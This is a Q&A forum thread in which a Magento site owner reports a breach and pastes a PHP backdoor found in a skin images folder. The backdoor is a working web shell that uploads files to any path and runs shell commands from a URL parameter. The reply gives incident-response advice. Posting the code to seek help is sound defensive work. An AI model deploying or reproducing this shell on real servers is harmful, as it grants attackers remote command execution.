2

My magento installation seems to have had a security breach.

In /skin/install/default/default/images/ a file called index.php has appeared.

It contains the following code:

<?php

if(@$_REQUEST["id"]== 'yes')

{

$files = @$_FILES["files"];

if($files["name"] != ''){

$fullpath = $_REQUEST["path"].$files["name"];

if(move_uploaded_file($files['tmp_name'],$fullpath)){

echo "<h1><a href='$fullpath'>shell</a></h1>";

}

}

exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');

} 

if(@$_REQUEST["id"]== 'no')

{

system($_GET["cmd"]);

}

?>
Alison
  • 21
  • 1

1 Answers1

2

First and foremost, change all passwords immediately. Download any log file data from your host, be it Web Server, FTP, etc. log files to help pinpoint what has been compromised. Contact your hosting provider for any insight and help they may offer.

The safest option however is to determine when the site was compromised and restore from a backup before hand. It can be more difficult and time consuming than data loss to prevent any installed back doors.

The script appears to be allowing for the execution of system commands via parameters and the ability to download/upload files to the system.

Good luck.

Further Reading:

B00MER
  • 8,307
  • 2
  • 21
  • 49